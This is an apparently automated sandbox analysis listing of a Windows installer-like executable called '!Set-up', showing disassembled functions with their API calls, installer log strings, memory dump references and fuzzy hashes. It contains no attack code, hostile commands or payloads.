                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                              • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                              • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                              • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                              Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                              • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                              • API String ID: 1641139501-220328614
                                                              • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                              • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                              • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                              • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                              Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                              • API String ID: 3734993849-3206598305
                                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                              Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                              Strings
                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                              • String ID: created uninstaller: %d, "%s"
                                                              • API String ID: 3294113728-3145124454
                                                              • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                              • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                              • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                              • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                              Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                              Strings
                                                              • `G, xrefs: 0040246E
                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                              • API String ID: 1033533793-4193110038
                                                              • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                              • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                              Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                                              • GetSysColor.USER32(?), ref: 00403E57
                                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                                              • DeleteObject.GDI32(?), ref: 00403E81
                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                              Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                              Strings
                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                              • Exec: success ("%s"), xrefs: 00402263
                                                              • Exec: command="%s", xrefs: 00402241
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                              • API String ID: 2014279497-3433828417
                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                              Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                              • GetMessagePos.USER32 ref: 0040489D
                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                              • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                              • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                              • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                              Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                              • MulDiv.KERNEL32(00039800,00000064,00E2D857), ref: 00403295
                                                              • wsprintfW.USER32 ref: 004032A5
                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 0040329F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
